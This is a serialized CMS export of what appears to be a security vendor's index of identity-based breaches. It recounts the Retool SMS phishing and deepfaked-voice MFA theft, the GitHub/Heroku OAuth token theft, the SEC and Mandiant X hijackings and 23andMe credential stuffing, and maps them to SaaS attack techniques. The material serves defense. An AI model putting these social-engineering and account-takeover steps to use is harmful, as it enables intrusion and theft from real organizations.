2023",[],{},{"nodeType":178,"data":223127,"content":223128},{},[223129],{"nodeType":173,"value":223130,"marks":223131,"data":223132},"Software development company Retool disclosed that the accounts of 27 of its cloud customers were compromised following a targeted SMS-based social engineering attack, which was enabled by Google Authenticator’s default synchronization of MFA tokens with the associated Google account.  ",[],{},{"nodeType":235,"data":223134,"content":223135},{},[223136],{"nodeType":173,"value":223137,"marks":223138,"data":223139},"How did Retool get breached?",[],{},{"nodeType":250,"data":223141,"content":223142},{},[223143,223153,223163,223173,223183,223193],{"nodeType":254,"data":223144,"content":223145},{},[223146],{"nodeType":178,"data":223147,"content":223148},{},[223149],{"nodeType":173,"value":223150,"marks":223151,"data":223152},"The threat actor launched a targeted SMS-based phishing campaign against Retool employees with a custom lure relating to their workplace healthcare coverage.",[],{},{"nodeType":254,"data":223154,"content":223155},{},[223156],{"nodeType":178,"data":223157,"content":223158},{},[223159],{"nodeType":173,"value":223160,"marks":223161,"data":223162},"The timing coincided with a recently announced migration of logins to Okta, and the message contained a url disguised to look like their internal identity portal.",[],{},{"nodeType":254,"data":223164,"content":223165},{},[223166],{"nodeType":178,"data":223167,"content":223168},{},[223169],{"nodeType":173,"value":223170,"marks":223171,"data":223172},"After logging into the fake portal – which included an MFA form – the threat actor called the employee impersonating an IT team member, deepfaking the IT employee’s real voice and using real information about the company to build trust.",[],{},{"nodeType":254,"data":223174,"content":223175},{},[223176],{"nodeType":178,"data":223177,"content":223178},{},[223179],{"nodeType":173,"value":223180,"marks":223181,"data":223182},"The phished employee shared an MFA OTP token which allowed the threat actor to add their own personal device to the employee’s Okta account and enabled their own Okta MFA from that point forward.",[],{},{"nodeType":254,"data":223184,"content":223185},{},[223186],{"nodeType":178,"data":223187,"content":223188},{},[223189],{"nodeType":173,"value":223190,"marks":223191,"data":223192},"Due to the Google Authenticator synchronization feature that syncs MFA codes to the cloud by default, meaning that access to a Google account immediately gave access to all MFA tokens held within that account.",[],{},{"nodeType":254,"data":223194,"content":223195},{},[223196],{"nodeType":178,"data":223197,"content":223198},{},[223199],{"nodeType":173,"value":223200,"marks":223201,"data":223202},"This enabled the threat actor to take over a number of identities associated with a range of target apps and change the credentials.",[],{},{"nodeType":235,"data":223204,"content":223205},{},[223206],{"nodeType":173,"value":223207,"marks":223208,"data":223209},"What was the impact of the Retool breach?",[],{},{"nodeType":250,"data":223211,"content":223212},{},[223213,223223,223233],{"nodeType":254,"data":223214,"content":223215},{},[223216],{"nodeType":178,"data":223217,"content":223218},{},[223219],{"nodeType":173,"value":223220,"marks":223221,"data":223222},"A total of 27 customers were impacted, with the threat actor specifically targeting customers in the Crypto industry.",[],{},{"nodeType":254,"data":223224,"content":223225},{},[223226],{"nodeType":178,"data":223227,"content":223228},{},[223229],{"nodeType":173,"value":223230,"marks":223231,"data":223232},"After taking over the accounts, the threat actor was observed gathering information and exploring the Retool apps.",[],{},{"nodeType":254,"data":223234,"content":223235},{},[223236],{"nodeType":178,"data":223237,"content":223238},{},[223239],{"nodeType":173,"value":223240,"marks":223241,"data":223242},"After learning of the attack, Retool revoked all internal authenticated sessions (Okta, GSuite, etc.) for employees, locked down access to the affected accounts, notified the affected customers, and restored their accounts to their original state.",[],{},{"nodeType":235,"data":223244,"content":223245},{},[223246],{"nodeType":173,"value":223247,"marks":223248,"data":223249},"What stands out in the Retool breach?",[],{},{"nodeType":250,"data":223251,"content":223252},{},[223253,223263,223273],{"nodeType":254,"data":223254,"content":223255},{},[223256],{"nodeType":178,"data":223257,"content":223258},{},[223259],{"nodeType":173,"value":223260,"marks":223261,"data":223262},"Like the MGM breach, the Retool breach demonstrates how financially motivated organized criminal groups are specifically targeting the identity infrastructure of an organization (e.g. the chosen IdP solution) and leveraging cloud-native functionality. ",[],{},{"nodeType":254,"data":223264,"content":223265},{},[223266],{"nodeType":178,"data":223267,"content":223268},{},[223269],{"nodeType":173,"value":223270,"marks":223271,"data":223272},"A further similarity with the MGM breach, while attackers were focused on taking control of the cloud IdP, the initial access vector was notable for being a more traditional method (SMS phishing in this case) to bypass the need to acquire credentials (password and MFA token). This type of technique remains consistently effective, regardless of the technology landscape and whether MFA is correctly implemented or not.    ",[],{},{"nodeType":254,"data":223274,"content":223275},{},[223276],{"nodeType":178,"data":223277,"content":223278},{},[223279],{"nodeType":173,"value":223280,"marks":223281,"data":223282},"In this case, the attacker abused inherent weaknesses in Google Authenticator, which came under fire following the breach for its default synchronization of MFA codes to the cloud when connected to an account, in order to move laterally and compromise other target apps. ",[],{},{"nodeType":235,"data":223284,"content":223285},{},[223286],{"nodeType":173,"value":222177,"marks":223287,"data":223288},[],{},{"nodeType":178,"data":223290,"content":223291},{},[223292],{"nodeType":173,"value":221726,"marks":223293,"data":223294},[],{},{"nodeType":1653,"data":223296,"content":223297},{},[223298,223337,223401],{"nodeType":1657,"data":223299,"content":223300},{},[223301,223310,223319,223328],{"nodeType":1661,"data":223302,"content":223303},{},[223304],{"nodeType":178,"data":223305,"content":223306},{},[223307],{"nodeType":173,"value":221742,"marks":223308,"data":223309},[],{},{"nodeType":1661,"data":223311,"content":223312},{},[223313],{"nodeType":178,"data":223314,"content":223315},{},[223316],{"nodeType":173,"value":222208,"marks":223317,"data":223318},[],{},{"nodeType":1661,"data":223320,"content":223321},{},[223322],{"nodeType":178,"data":223323,"content":223324},{},[223325],{"nodeType":173,"value":221762,"marks":223326,"data":223327},[],{},{"nodeType":1661,"data":223329,"content":223330},{},[223331],{"nodeType":178,"data":223332,"content":223333},{},[223334],{"nodeType":173,"value":221772,"marks":223335,"data":223336},[],{},{"nodeType":1657,"data":223338,"content":223339},{},[223340,223361,223382,223391],{"nodeType":1687,"data":223341,"content":223342},{},[223343],{"nodeType":178,"data":223344,"content":223345},{},[223346,223350,223358],{"nodeType":173,"value":37,"marks":223347,"data":223349},[223348],{"type":194},{},{"nodeType":186,"data":223351,"content":223352},{"uri":114964},[223353],{"nodeType":173,"value":223354,"marks":223355,"data":223357},"SAT1042",[223356],{"type":194},{},{"nodeType":173,"value":37,"marks":223359,"data":223360},[],{},{"nodeType":1687,"data":223362,"content":223363},{},[223364],{"nodeType":178,"data":223365,"content":223366},{},[223367,223371,223379],{"nodeType":173,"value":37,"marks":223368,"data":223370},[223369],{"type":194},{},{"nodeType":186,"data":223372,"content":223373},{"uri":114964},[223374],{"nodeType":173,"value":223375,"marks":223376,"data":223378},"AiTM Phishing",[223377],{"type":194},{},{"nodeType":173,"value":37,"marks":223380,"data":223381},[],{},{"nodeType":1687,"data":223383,"content":223384},{},[223385],{"nodeType":178,"data":223386,"content":223387},{},[223388],{"nodeType":173,"value":222278,"marks":223389,"data":223390},[],{},{"nodeType":1687,"data":223392,"content":223393},{},[223394],{"nodeType":178,"data":223395,"content":223396},{},[223397],{"nodeType":173,"value":223398,"marks":223399,"data":223400},"Attacker-in-the-Middle (AiTM) phishing uses dedicated tooling to act as a web proxy between the victim and a legitimate login portal for an application the victim has access to, principally to make it easier to defeat MFA protection.",[],{},{"nodeType":1657,"data":223402,"content":223403},{},[223404,223425,223447,223457],{"nodeType":1687,"data":223405,"content":223406},{},[223407],{"nodeType":178,"data":223408,"content":223409},{},[223410,223413,223422],{"nodeType":173,"value":37,"marks":223411,"data":223412},[],{},{"nodeType":186,"data":223414,"content":223416},{"uri":223415},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_enrollment/description.md",[223417],{"nodeType":173,"value":223418,"marks":223419,"data":223421},"SAT1043",[223420],{"type":194},{},{"nodeType":173,"value":37,"marks":223423,"data":223424},[],{},{"nodeType":1687,"data":223426,"content":223427},{},[223428],{"nodeType":178,"data":223429,"content":223430},{},[223431,223435,223443],{"nodeType":173,"value":37,"marks":223432,"data":223434},[223433],{"type":194},{},{"nodeType":186,"data":223436,"content":223437},{"uri":223415},[223438],{"nodeType":173,"value":223439,"marks":223440,"data":223442},"Device Enrollment",[223441],{"type":194},{},{"nodeType":173,"value":37,"marks":223444,"data":223446},[223445],{"type":194},{},{"nodeType":1687,"data":223448,"content":223449},{},[223450],{"nodeType":178,"data":223451,"content":223452},{},[223453],{"nodeType":173,"value":223454,"marks":223455,"data":223456},"Initial Access; Persistence",[],{},{"nodeType":1687,"data":223458,"content":223459},{},[223460],{"nodeType":178,"data":223461,"content":223462},{},[223463],{"nodeType":173,"value":223464,"marks":223465,"data":223466},"Enrollment of a new MFA device in order to allow an adversary to complete MFA challenges for future authentication. ",[],{},{"nodeType":231,"data":223468,"content":223469},{},[],{"nodeType":169,"data":223471,"content":223472},{},[223473],{"nodeType":173,"value":223474,"marks":223475,"data":223476},"GitHub / Heroku / Travis-CI / npm — April 2022",[],{},{"nodeType":178,"data":223478,"content":223479},{},[223480],{"nodeType":173,"value":223481,"marks":223482,"data":223483},"An unknown threat actor used stolen OAuth user tokens (issued to Heroku and Travis-CI) to download data from private repositories. The threat actor then compromised an internal Heroku customer database as well as accessed and stole data from dozens of downstream organizations using Heroku and Travis-CI-maintained OAuth apps.",[],{},{"nodeType":235,"data":223485,"content":223486},{},[223487],{"nodeType":173,"value":223488,"marks":223489,"data":223490},"How did they get breached?",[],{},{"nodeType":250,"data":223492,"content":223493},{},[223494,223504,223514,223524,223534,223544,223554],{"nodeType":254,"data":223495,"content":223496},{},[223497],{"nodeType":178,"data":223498,"content":223499},{},[223500],{"nodeType":173,"value":223501,"marks":223502,"data":223503},"The threat actor obtained access to two third-party OAuth integrators, Heroku and Travis-CI, accessing databases and downloading stored customer GitHub integration OAuth tokens. These tokens had earlier been used by Travis-CI and Heroku OAuth applications to integrate with GitHub to deploy applications.",[],{},{"nodeType":254,"data":223505,"content":223506},{},[223507],{"nodeType":178,"data":223508,"content":223509},{},[223510],{"nodeType":173,"value":223511,"marks":223512,"data":223513},"Access to the environment was gained by leveraging a compromised token for a Heroku machine account, but it is not disclosed how the threat actor achieved this. ",[],{},{"nodeType":254,"data":223515,"content":223516},{},[223517],{"nodeType":178,"data":223518,"content":223519},{},[223520],{"nodeType":173,"value":223521,"marks":223522,"data":223523},"The threat actor authenticated to the GitHub API using the stolen OAuth tokens issued to Heroku and Travis CI.",[],{},{"nodeType":254,"data":223525,"content":223526},{},[223527],{"nodeType":178,"data":223528,"content":223529},{},[223530],{"nodeType":173,"value":223531,"marks":223532,"data":223533},"For users who had the affected Heroku or Travis CI OAuth apps authorized in their GitHub accounts, the threat actor listed all the user's organizations.",[],{},{"nodeType":254,"data":223535,"content":223536},{},[223537],{"nodeType":178,"data":223538,"content":223539},{},[223540],{"nodeType":173,"value":223541,"marks":223542,"data":223543},"The threat actor then selected targets based on the listed organizations.",[],{},{"nodeType":254,"data":223545,"content":223546},{},[223547],{"nodeType":178,"data":223548,"content":223549},{},[223550],{"nodeType":173,"value":223551,"marks":223552,"data":223553},"The threat actor listed the private repositories for user accounts of interest and proceeded to clone private repositories of interest.",[],{},{"nodeType":254,"data":223555,"content":223556},{},[223557],{"nodeType":178,"data":223558,"content":223559},{},[223560],{"nodeType":173,"value":223561,"marks":223562,"data":223563},"GitHub identified unauthorized access to their npm production infrastructure using a compromised AWS API key, obtained by the threat actor when they downloaded a set of private npm repositories using a stolen OAuth token from one of the two affected third-party OAuth applications.",[],{},{"nodeType":235,"data":223565,"content":223566},{},[223567],{"nodeType":173,"value":223568,"marks":223569,"data":223570},"What was the impact?",[],{},{"nodeType":250,"data":223572,"content":223573},{},[223574,223584,223594],{"nodeType":254,"data":223575,"content":223576},{},[223577],{"nodeType":178,"data":223578,"content":223579},{},[223580],{"nodeType":173,"value":223581,"marks":223582,"data":223583},"By stealing these OAuth tokens, the threat actor could access and download data from GitHub repositories belonging to those who authorized the compromised Heroku or Travis CI OAuth apps with their accounts. ",[],{},{"nodeType":254,"data":223585,"content":223586},{},[223587],{"nodeType":178,"data":223588,"content":223589},{},[223590],{"nodeType":173,"value":223591,"marks":223592,"data":223593},"The threat actor was able to mine the downloaded private repositories for secrets that could be used to pivot to other infrastructure, stealing data from dozens of organizations. ",[],{},{"nodeType":254,"data":223595,"content":223596},{},[223597],{"nodeType":178,"data":223598,"content":223599},{},[223600],{"nodeType":173,"value":223601,"marks":223602,"data":223603},"In addition to user repo’s downstream, the compromised token for a Heroku machine account obtained by threat actors also allowed unauthorized access into Heroku's internal database of customer accounts, enabling the threat actor to extract the hashed and salted passwords. ",[],{},{"nodeType":235,"data":223605,"content":223606},{},[223607],{"nodeType":173,"value":223608,"marks":223609,"data":223610},"What stands out in the Github breach?",[],{},{"nodeType":250,"data":223612,"content":223613},{},[223614,223624,223634],{"nodeType":254,"data":223615,"content":223616},{},[223617],{"nodeType":178,"data":223618,"content":223619},{},[223620],{"nodeType":173,"value":223621,"marks":223622,"data":223623},"Similar to the Okta breach, this attack showcases the possibility of third-party supply chain attacks to target downstream organizations using cloud SaaS services. In this case, targeting OAuth integrators as opposed to IdP providers, but with a similar goal and impact of compromising the real target organizations downstream. ",[],{},{"nodeType":254,"data":223625,"content":223626},{},[223627],{"nodeType":178,"data":223628,"content":223629},{},[223630],{"nodeType":173,"value":223631,"marks":223632,"data":223633},"Applications like Github are an obvious target for attackers due to their widespread adoption. There have been numerous attacks leveraging Github as the vehicle for attacks by compromising repo’s to insert malicious code, or registering malicious copycat repo’s to dupe users into using them. ",[],{},{"nodeType":254,"data":223635,"content":223636},{},[223637],{"nodeType":178,"data":223638,"content":223639},{},[223640],{"nodeType":173,"value":223641,"marks":223642,"data":223643},"Unlike the attacks abusing the functionality of Github (repo poisoning) which target the legitimate developer processes when using the app, this attack could have been prevented at the identity layer before the attacker was able to breach the Heroku/Travis-CI accounts. ",[],{},{"nodeType":235,"data":223645,"content":223646},{},[223647],{"nodeType":173,"value":222177,"marks":223648,"data":223649},[],{},{"nodeType":178,"data":223651,"content":223652},{},[223653],{"nodeType":173,"value":221726,"marks":223654,"data":223655},[],{},{"nodeType":1653,"data":223657,"content":223658},{},[223659,223698,223758,223820],{"nodeType":1657,"data":223660,"content":223661},{},[223662,223671,223680,223689],{"nodeType":1661,"data":223663,"content":223664},{},[223665],{"nodeType":178,"data":223666,"content":223667},{},[223668],{"nodeType":173,"value":221742,"marks":223669,"data":223670},[],{},{"nodeType":1661,"data":223672,"content":223673},{},[223674],{"nodeType":178,"data":223675,"content":223676},{},[223677],{"nodeType":173,"value":222208,"marks":223678,"data":223679},[],{},{"nodeType":1661,"data":223681,"content":223682},{},[223683],{"nodeType":178,"data":223684,"content":223685},{},[223686],{"nodeType":173,"value":221762,"marks":223687,"data":223688},[],{},{"nodeType":1661,"data":223690,"content":223691},{},[223692],{"nodeType":178,"data":223693,"content":223694},{},[223695],{"nodeType":173,"value":221772,"marks":223696,"data":223697},[],{},{"nodeType":1657,"data":223699,"content":223700},{},[223701,223720,223739,223749],{"nodeType":1687,"data":223702,"content":223703},{},[223704],{"nodeType":178,"data":223705,"content":223706},{},[223707,223710,223717],{"nodeType":173,"value":37,"marks":223708,"data":223709},[],{},{"nodeType":186,"data":223711,"content":223712},{"uri":197917},[223713],{"nodeType":173,"value":222369,"marks":223714,"data":223716},[223715],{"type":194},{},{"nodeType":173,"value":37,"marks":223718,"data":223719},[],{},{"nodeType":1687,"data":223721,"content":223722},{},[223723],{"nodeType":178,"data":223724,"content":223725},{},[223726,223729,223736],{"nodeType":173,"value":37,"marks":223727,"data":223728},[],{},{"nodeType":186,"data":223730,"content":223731},{"uri":197917},[223732],{"nodeType":173,"value":222389,"marks":223733,"data":223735},[223734],{"type":194},{},{"nodeType":173,"value":37,"marks":223737,"data":223738},[],{},{"nodeType":1687,"data":223740,"content":223741},{},[223742],{"nodeType":178,"data":223743,"content":223744},{},[223745],{"nodeType":173,"value":223746,"marks":223747,"data":223748},"Privilege Escalation; Lateral Movement",[],{},{"nodeType":1687,"data":223750,"content":223751},{},[223752],{"nodeType":178,"data":223753,"content":223754},{},[223755],{"nodeType":173,"value":222413,"marks":223756,"data":223757},[],{},{"nodeType":1657,"data":223759,"content":223760},{},[223761,223781,223800,223810],{"nodeType":1687,"data":223762,"content":223763},{},[223764],{"nodeType":178,"data":223765,"content":223766},{},[223767,223770,223778],{"nodeType":173,"value":37,"marks":223768,"data":223769},[],{},{"nodeType":186,"data":223771,"content":223772},{"uri":59347},[223773],{"nodeType":173,"value":223774,"marks":223775,"data":223777},"SAT1004",[223776],{"type":194},{},{"nodeType":173,"value":37,"marks":223779,"data":223780},[],{},{"nodeType":1687,"data":223782,"content":223783},{},[223784],{"nodeType":178,"data":223785,"content":223786},{},[223787,223790,223797],{"nodeType":173,"value":37,"marks":223788,"data":223789},[],{},{"nodeType":186,"data":223791,"content":223792},{"uri":59347},[223793],{"nodeType":173,"value":59350,"marks":223794,"data":223796},[223795],{"type":194},{},{"nodeType":173,"value":37,"marks":223798,"data":223799},[],{},{"nodeType":1687,"data":223801,"content":223802},{},[223803],{"nodeType":178,"data":223804,"content":223805},{},[223806],{"nodeType":173,"value":223807,"marks":223808,"data":223809},"Persistence; Defense Evasion",[],{},{"nodeType":1687,"data":223811,"content":223812},{},[223813],{"nodeType":178,"data":223814,"content":223815},{},[223816],{"nodeType":173,"value":223817,"marks":223818,"data":223819},"An adversary that has compromised an account could then read existing API keys from the app settings, if the app allows this, or create a new API key.",[],{},{"nodeType":1657,"data":223821,"content":223822},{},[223823,223844,223864,223874],{"nodeType":1687,"data":223824,"content":223825},{},[223826],{"nodeType":178,"data":223827,"content":223828},{},[223829,223832,223841],{"nodeType":173,"value":37,"marks":223830,"data":223831},[],{},{"nodeType":186,"data":223833,"content":223835},{"uri":223834},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/app_directory_lookup/description.md#app-directory-lookup",[223836],{"nodeType":173,"value":223837,"marks":223838,"data":223840},"SAT1006",[223839],{"type":194},{},{"nodeType":173,"value":37,"marks":223842,"data":223843},[],{},{"nodeType":1687,"data":223845,"content":223846},{},[223847],{"nodeType":178,"data":223848,"content":223849},{},[223850,223853,223861],{"nodeType":173,"value":37,"marks":223851,"data":223852},[],{},{"nodeType":186,"data":223854,"content":223855},{"uri":223834},[223856],{"nodeType":173,"value":223857,"marks":223858,"data":223860},"App directory lookup",[223859],{"type":194},{},{"nodeType":173,"value":37,"marks":223862,"data":223863},[],{},{"nodeType":1687,"data":223865,"content":223866},{},[223867],{"nodeType":178,"data":223868,"content":223869},{},[223870],{"nodeType":173,"value":223871,"marks":223872,"data":223873},"Discovery",[],{},{"nodeType":1687,"data":223875,"content":223876},{},[223877],{"nodeType":178,"data":223878,"content":223879},{},[223880],{"nodeType":173,"value":223881,"marks":223882,"data":223883},"An adversary who has gained a foothold via a SaaS app could download the list of users accessible to them in order to better target attacks against other users.",[],{},{"nodeType":231,"data":223885,"content":223886},{},[],{"nodeType":169,"data":223888,"content":223889},{},[223890],{"nodeType":173,"value":223891,"marks":223892,"data":223893},"Other notable attacks",[],{},{"nodeType":235,"data":223895,"content":223896},{},[223897],{"nodeType":173,"value":223898,"marks":223899,"data":223900},"SEC X hack — January 2024",[],{},{"nodeType":178,"data":223902,"content":223903},{},[223904],{"nodeType":173,"value":223905,"marks":223906,"data":223907},"The X account for the U.S. Securities and Exchange Commission was victim to a SIM swapping attack, whereupon the attacker used the social media platform to issue a fake announcement on the approval of Bitcoin ETFs on security exchanges.",[],{},{"nodeType":178,"data":223909,"content":223910},{},[223911],{"nodeType":173,"value":223912,"marks":223913,"data":223914},"Once the threat actors controlled the number, they reset the password for the @SECGov account, and created the fake announcement. The SEC also confirmed that multi-factor authentication was not enabled on the account, as they had asked X support to disable it when they encountered problems logging into the account.",[],{},{"nodeType":231,"data":223916,"content":223917},{},[],{"nodeType":235,"data":223919,"content":223920},{},[223921],{"nodeType":173,"value":223922,"marks":223923,"data":223924},"Mandiant X hack — January 2024",[],{},{"nodeType":178,"data":223926,"content":223927},{},[223928],{"nodeType":173,"value":223929,"marks":223930,"data":223931},"The X account for Mandiant was hacked by a Drainer-as-a-Service (DaaS) gang in a brute force attack. MFA was not enabled on the account. The threat actor used the social media account to share links redirecting to a phishing page to steal cryptocurrency. ",[],{},{"nodeType":178,"data":223933,"content":223934},{},[223935],{"nodeType":173,"value":223936,"marks":223937,"data":223938},"The attacker used a wallet drainer dubbed CLINKSINK. This same drainer has been used since December to steal funds and tokens from users of Solana cryptocurrency as part of a large-scale campaign involving at least 35 affiliate IDs linked to a shared DaaS.",[],{},{"nodeType":231,"data":223940,"content":223941},{},[],{"nodeType":235,"data":223943,"content":223944},{},[223945],{"nodeType":173,"value":223946,"marks":223947,"data":223948},"23andMe data breach — April 2023",[],{},{"nodeType":178,"data":223950,"content":223951},{},[223952],{"nodeType":173,"value":223953,"marks":223954,"data":223955},"Genetic testing provider 23andMe confirmed that hackers downloaded the data of 6.9 million people of the existing 14 million customers after breaching around 14,000 user accounts. ",[],{},{"nodeType":178,"data":223957,"content":223958},{},[223959],{"nodeType":173,"value":223960,"marks":223961,"data":223962},"The attacker stole health reports and raw genotype data of customers affected by a credential stuffing attack that went unnoticed for five months, from April 29 to September 27. ",[],{},{"nodeType":178,"data":223964,"content":223965},{},[223966],{"nodeType":173,"value":223967,"marks":223968,"data":223969},"The credentials used by the attackers to breach the customers' accounts were stolen in other data breaches or used on previously compromised online platforms, and targeted accounts without MFA. ",[],{},"Tracking identity-based attacks in the wild","To keep track of how identity attacks are evolving, we’ve put together this helpful index of recent breaches, focusing on the latest identity-based techniques. ","2024-03-21T00:00:00.000Z","identity-attacks-in-the-wild",{"items":223975},[223976,223978],{"sys":223977,"name":505},{"id":504},{"sys":223979,"name":509},{"id":508},{"items":223981},[223982],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":223983},{"url":1496},{"__typename":1528,"sys":223985,"content":223986,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":224663,"authorsCollection":224669},{"id":183305},{"json":223987},{"nodeType":165,"data":223988,"content":223989},{},[223990,223995,224001,224043,224049,224055,224068,224074,224080,224149,224155,224160,224166,224172,224185,224191,224197,224217,224237,224242,224259,224265,224271,224298,224304,224310,224315,224332,224338,224344,224350,224356,224361,224378,224384,224390,224396,224402,224407,224424,224430,224436,224441,224458,224464,224470,224476,224518,224524,224585,224598,224603,224609,224615,224621,224627,224642,224648],{"nodeType":312,"data":223991,"content":223994},{"target":223992},{"sys":223993},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":223996,"content":223997},{},[223998],{"nodeType":173,"value":183320,"marks":223999,"data":224000},[],{},{"nodeType":178,"data":224002,"content":224003},{},[224004,224007,224013,224016,224022,224025,224031,224034,224040],{"nodeType":173,"value":183327,"marks":224005,"data":224006},[],{},{"nodeType":186,"data":224008,"content":224009},{"uri":183332},[224010],{"nodeType":173,"value":183335,"marks":224011,"data":224012},[],{},{"nodeType":173,"value":3107,"marks":224014,"data":224015},[],{},{"nodeType":186,"data":224017,"content":224018},{"uri":183343},[224019],{"nodeType":173,"value":183346,"marks":224020,"data":224021},[],{},{"nodeType":173,"value":3107,"marks":224023,"data":224024},[],{},{"nodeType":186,"data":224026,"content":224027},{"uri":1297},[224028],{"nodeType":173,"value":183356,"marks":224029,"data":224030},[],{},{"nodeType":173,"value":3107,"marks":224032,"data":224033},[],{},{"nodeType":186,"data":224035,"content":224036},{"uri":183364},[224037],{"nodeType":173,"value":183367,"marks":224038,"data":224039},[],{},{"nodeType":173,"value":183371,"marks":224041,"data":224042},[],{},{"nodeType":178,"data":224044,"content":224045},{},[224046],{"nodeType":173,"value":183378,"marks":224047,"data":224048},[],{},{"nodeType":178,"data":224050,"content":224051},{},[224052],{"nodeType":173,"value":183385,"marks":224053,"data":224054},[],{},{"nodeType":178,"data":224056,"content":224057},{},[224058,224061,224065],{"nodeType":173,"value":183392,"marks":224059,"data":224060},[],{},{"nodeType":173,"value":183396,"marks":224062,"data":224064},[224063],{"type":370},{},{"nodeType":173,"value":1477,"marks":224066,"data":224067},[],{},{"nodeType":178,"data":224069,"content":224070},{},[224071],{"nodeType":173,"value":183407,"marks":224072,"data":224073},[],{},{"nodeType":178,"data":224075,"content":224076},{},[224077],{"nodeType":173,"value":183414,"marks":224078,"data":224079},[],{},{"nodeType":250,"data":224081,"content":224082},{},[224083,224108],{"nodeType":254,"data":224084,"content":224085},{},[224086],{"nodeType":178,"data":224087,"content":224088},{},[224089,224093,224096,224105],{"nodeType":173,"value":183427,"marks":224090,"data":224092},[224091],{"type":370},{},{"nodeType":173,"value":183432,"marks":224094,"data":224095},[],{},{"nodeType":1698,"data":224097,"content":224100},{"target":224098},{"sys":224099},{"id":183439,"type":317,"linkType":318},[224101],{"nodeType":173,"value":18649,"marks":224102,"data":224104},[224103],{"type":370},{},{"nodeType":173,"value":183446,"marks":224106,"data":224107},[],{},{"nodeType":254,"data":224109,"content":224110},{},[224111],{"nodeType":178,"data":224112,"content":224113},{},[224114,224118,224121,224127,224130,224136,224139,224146],{"nodeType":173,"value":183456,"marks":224115,"data":224117},[224116],{"type":370},{},{"nodeType":173,"value":183461,"marks":224119,"data":224120},[],{},{"nodeType":186,"data":224122,"content":224123},{"uri":183466},[224124],{"nodeType":173,"value":183469,"marks":224125,"data":224126},[],{},{"nodeType":173,"value":2936,"marks":224128,"data":224129},[],{},{"nodeType":186,"data":224131,"content":224132},{"uri":114007},[224133],{"nodeType":173,"value":183479,"marks":224134,"data":224135},[],{},{"nodeType":173,"value":183483,"marks":224137,"data":224138},[],{},{"nodeType":186,"data":224140,"content":224141},{"uri":183488},[224142],{"nodeType":173,"value":2718,"marks":224143,"data":224145},[224144],{"type":370},{},{"nodeType":173,"value":183495,"marks":224147,"data":224148},[],{},{"nodeType":178,"data":224150,"content":224151},{},[224152],{"nodeType":173,"value":183502,"marks":224153,"data":224154},[],{},{"nodeType":312,"data":224156,"content":224159},{"target":224157},{"sys":224158},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":224161,"content":224162},{},[224163],{"nodeType":173,"value":183514,"marks":224164,"data":224165},[],{},{"nodeType":178,"data":224167,"content":224168},{},[224169],{"nodeType":173,"value":183521,"marks":224170,"data":224171},[],{},{"nodeType":178,"data":224173,"content":224174},{},[224175,224178,224182],{"nodeType":173,"value":183528,"marks":224176,"data":224177},[],{},{"nodeType":173,"value":18649,"marks":224179,"data":224181},[224180],{"type":370},{},{"nodeType":173,"value":183536,"marks":224183,"data":224184},[],{},{"nodeType":178,"data":224186,"content":224187},{},[224188],{"nodeType":173,"value":183543,"marks":224189,"data":224190},[],{},{"nodeType":235,"data":224192,"content":224193},{},[224194],{"nodeType":173,"value":24345,"marks":224195,"data":224196},[],{},{"nodeType":178,"data":224198,"content":224199},{},[224200,224203,224207,224210,224214],{"nodeType":173,"value":183556,"marks":224201,"data":224202},[],{},{"nodeType":173,"value":183560,"marks":224204,"data":224206},[224205],{"type":370},{},{"nodeType":173,"value":933,"marks":224208,"data":224209},[],{},{"nodeType":173,"value":183568,"marks":224211,"data":224213},[224212],{"type":370},{},{"nodeType":173,"value":1477,"marks":224215,"data":224216},[],{},{"nodeType":178,"data":224218,"content":224219},{},[224220,224223,224227,224230,224234],{"nodeType":173,"value":183579,"marks":224221,"data":224222},[],{},{"nodeType":173,"value":2740,"marks":224224,"data":224226},[224225],{"type":370},{},{"nodeType":173,"value":1464,"marks":224228,"data":224229},[],{},{"nodeType":173,"value":2748,"marks":224231,"data":224233},[224232],{"type":370},{},{"nodeType":173,"value":183594,"marks":224235,"data":224236},[],{},{"nodeType":312,"data":224238,"content":224241},{"target":224239},{"sys":224240},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":224243,"content":224244},{},[224245,224248,224256],{"nodeType":173,"value":183606,"marks":224246,"data":224247},[],{},{"nodeType":1698,"data":224249,"content":224252},{"target":224250},{"sys":224251},{"id":2148,"type":317,"linkType":318},[224253],{"nodeType":173,"value":65996,"marks":224254,"data":224255},[],{},{"nodeType":173,"value":37,"marks":224257,"data":224258},[],{},{"nodeType":235,"data":224260,"content":224261},{},[224262],{"nodeType":173,"value":125683,"marks":224263,"data":224264},[],{},{"nodeType":178,"data":224266,"content":224267},{},[224268],{"nodeType":173,"value":183630,"marks":224269,"data":224270},[],{},{"nodeType":178,"data":224272,"content":224273},{},[224274,224277,224281,224284,224288,224291,224295],{"nodeType":173,"value":183637,"marks":224275,"data":224276},[],{},{"nodeType":173,"value":2740,"marks":224278,"data":224280},[224279],{"type":370},{},{"nodeType":173,"value":1464,"marks":224282,"data":224283},[],{},{"nodeType":173,"value":2748,"marks":224285,"data":224287},[224286],{"type":370},{},{"nodeType":173,"value":183652,"marks":224289,"data":224290},[],{},{"nodeType":173,"value":2701,"marks":224292,"data":224294},[224293],{"type":370},{},{"nodeType":173,"value":183660,"marks":224296,"data":224297},[],{},{"nodeType":178,"data":224299,"content":224300},{},[224301],{"nodeType":173,"value":183667,"marks":224302,"data":224303},[],{},{"nodeType":178,"data":224305,"content":224306},{},[224307],{"nodeType":173,"value":183674,"marks":224308,"data":224309},[],{},{"nodeType":312,"data":224311,"content":224314},{"target":224312},{"sys":224313},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":224316,"content":224317},{},[224318,224321,224329],{"nodeType":173,"value":183606,"marks":224319,"data":224320},[],{},{"nodeType":1698,"data":224322,"content":224325},{"target":224323},{"sys":224324},{"id":2405,"type":317,"linkType":318},[224326],{"nodeType":173,"value":125683,"marks":224327,"data":224328},[],{},{"nodeType":173,"value":37,"marks":224330,"data":224331},[],{},{"nodeType":235,"data":224333,"content":224334},{},[224335],{"nodeType":173,"value":157048,"marks":224336,"data":224337},[],{},{"nodeType":178,"data":224339,"content":224340},{},[224341],{"nodeType":173,"value":183710,"marks":224342,"data":224343},[],{},{"nodeType":178,"data":224345,"content":224346},{},[224347],{"nodeT